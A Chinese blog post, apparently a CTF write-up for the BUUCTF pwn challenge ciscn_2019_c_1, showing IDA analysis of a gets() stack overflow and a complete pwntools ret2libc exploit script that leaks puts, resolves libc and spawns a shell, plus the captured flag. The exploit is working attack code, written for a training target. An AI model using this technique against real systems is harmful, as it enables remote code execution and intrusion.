[buuuctf]ciscn_2019_c_1

最新推荐文章于 2024-04-08 00:15:36 发布
最新推荐文章于 2024-04-08 00:15:36 发布
阅读量431 收藏 2
点赞数 1
分类专栏: PWN # buuctf 文章标签: c语言 linux 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125309444
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏
本文详细介绍了如何通过ida分析一个64位Linux程序,检查其保护机制,找到关键函数,并利用栈溢出漏洞进行 libc 溢出攻击。首先,通过checksec确定程序开启NX保护,然后在ida中分析main函数,发现加密函数encrypt。通过构造特定输入,绕过strlen检查,利用LibcSearcher库找到特定地址,最终实现利用漏洞获取flag。
摘要由CSDN通过智能技术生成

[buuuctf]ciscn_2019_c_1

解题思路

查壳

第一步也就是查壳,拖入软件中,之后获得到了这个是64位的软件。
在这里插入图片描述

ida中查看逻辑等信息

先放入Linux中进行checksec中,发现开启了NX保护,其他的保护未开,接下来放入ida中。
在这里插入图片描述
发现有main函数,查看main函数。
在这里插入图片描述
发现是这个样子的,那么就现在linux下面运行一下,看一下第一步出现的效果是什么样子的,第一步的效果是输出那些字母。
在这里插入图片描述
有一个相对应的位置,之后call进入了这个begin的函数内,跳转进去看是有什么,发现正好对应上下面的1.2.3.4的输入位置。
在这里插入图片描述
没发现有什么输入的位置,跳回去,这里就是正常输出一些信息的地方回到main函数,之后按照流程来看,是进入了loc_400B8A,之后进入发现,有何输入,之后判断是否是2,否则怎么跳转,在linux中实验一下,发现,你输入的数字被写入rbp+var_4的为位置,之后把rbp+var_4给eax,之后比较eax是否等于2,如果等于二,跳转到loc_400BDE的位置输出,之后输出I think you can do it by yourself,值赋值为0,跳转到loc_400c16,之后在跳转到loc_400B8A,直接转回去了。
在这里插入图片描述
之后输入3看一下,前面都一样,看一眼怎么跳的。
在这里插入图片描述
3的话,直接就这么跳转出去了,之后看看1。
在这里插入图片描述
这是你输入1或者1,2,3都不是的情况,但是我们要进入1中有个重要的函数是加密,也就是encrypt,进入encrypt中之后发现是一个很大的流程,之后继续进行分析。
在这里插入图片描述
进来之后发现,是一个这种结构的流程,发现有一个gets,这个,还有就是对于c字符串的,字符串是遇到\x00就会结束,但是gets不会结束,之后发现这个题目里面没有给/bin/sh和system的函数,所以用libc泄露进行溢出。
在这里插入图片描述
这里汇编看的有点不舒服,有的地方不确定,所以反编译。
在这里插入图片描述
这里进行了很多的运算,到时候对于libc不方便,那么就利用这个字符串进行绕过,开头一个\x00进行输入,下面吗的strlen就等于0,之后如果你输入的小于等于0,直接break,直接就跳出了这个循环之中,所有写的都写入了gets中没有任何运算,看一眼环境是ubuntu18,需要进行栈对齐,所以我加上我们需要从libc中获取到/bin/sh和system,根据64位的调用规则是rdi,rsi,rdx,rcx,r8,r9进行调用,所以我们需要两个东西,一个是ret的地址,进行栈对齐,还有就是pop rdi。
在这里插入图片描述
在这里插入图片描述
一个是pop rdi和ret的位置,所以需要LibcSearcher库写脚本的时候,所以大概的脚本前期第一步所有的已知,先看看需要多大进行溢出。
在这里插入图片描述
那么脚本就可以开始写了。

脚本

from pwn import * #调用pwn库
from LibcSearcher import * #调用LibcSearcher库
context(os='linux', arch='amd64', log_level='debug') #linux系统 64位 debug模式

#调用开始
#p = process('./ciscn_2019_c_1')
p = remote('node4.buuoj.cn',25837)
elf = ELF('ciscn_2019_c_1')
got_s = elf.got['puts']
plt_s = elf.plt['puts']
main_s = elf.sym['main']

#已知
ret = 0x04006b9
pop_rdi = 0x0400c83

#payload
#第一次
payload = b'\x00' + b'a'*(0x50-1+8) +p64(pop_rdi) + p64(got_s) + p64(plt_s) + p64(main_s)#结构是\x00 + 溢出字符 + pop_rdi + got + plt + main
p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)
p.recvuntil('Ciphertext\n')
p.recvline()
puts_a = u64(p.recv(7)[:-1].ljust(8,b'\x00'))

#获取libc溢出的地址
libc = LibcSearcher('puts', puts_a)
libc_b = puts_a - libc.dump('puts')
system_a = libc_b+ libc.dump('system')
binsh_a = libc_b + libc.dump('str_bin_sh')

#第二次
payload =b'\x00' +b'a' * (0x50 -1+ 8)
payload = payload + p64(ret) + p64(pop_rdi) + p64(binsh_a) + p64(system_a)#格式 \x00 + 溢出的字符 + 栈对其 + pop_rdi + /bin/sh + system
p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)
p.interactive()

最后获得flag
在这里插入图片描述
flag{f0a2cf81-4dba-4e43-a1e0-5696a077fac8}

逆向萌新
关注
专栏目录
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 268
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
[0xFA-2021][Buuctf]Reverse_1
weixin_50962947的博客
09-13 1044
[0xFA-2021][Buuctf]Reverse_1 你应该知道的: 使用IDA打开一个文件 学会使用IDA的字符串窗口 学会IDA基本的操作 对引用有初步认识 用IDA打开一个文件: 我们可以直接打开IDA,然后: 可以点击New来打开一个新文件,或者点击Go把可执行文件拖入IDA,这二者都是可以的。要注意的是因为32位和64位的应用程序是不一样的所以我们要用对应的IDA版本来打开文件。如果一开始并不知道文件是几位的可以直接拖进其一,如果版本错误则会提示: 或者在反编译出现错误提示,因为程序
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 797
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
[BUUCTF]ciscn_2019_c_1
最新发布
Lucien_Carr的博客
04-08 1343
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
【BUUCTF-PWN】 ciscn_2019_c_1
qcwwww的博客
05-07 443
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
BUUUCTF reverse逆向
dusk!的博客
04-25 890
文章目录前言1.引入库二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 1.引入库 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd.
BUUCTF[极客大挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 209
这一题和easysql页面一样
buuuCTF sqli-labs
09-15
buuuCTF中,参与者需要通过利用sqli-labs中的漏洞来获取敏感信息、绕过认证、执行任意命令等。通常,参与者需要使用不同的技术和方法来解决各个挑战。对于buuuCTF的具体解题方法和答案,请参考比赛规则和相关资料...
buuctf——re题目练习
m0_63606191的博客
01-22 937
1.easyre 方法一:ida打开,shift+F12找到flag。 方法二:找到main函数,F5进入,找到伪代码,可以直接看到flag。 2.reverse 先用exeinfoPE看一下是64位的,用IDA64打开,用F12进入String window,看到了.rdata:0000000140019C90 00000019 C this is the right flag!\n,直接双击进入。出现了: .rdata:0000000140019C90 aThisIsTheRi...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1337
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 597
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 7230
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
ciscn_2019_c_1
qq_45913417的博客
11-18 8860
经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。 边做题边C语言:艹! 输入字符串s加密逻辑: 1、如果是小写字母跟0xD异或 2、如果是大写字母跟0xE异或 3、如果是数字跟0xF异或 [ASCII码对照表]:(http://c.biancheng.net/c/ascii/) LibcSearcher工具:https://github.com/dev2ero/LibcSearcher from pwn import * from LibcSearcher i
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值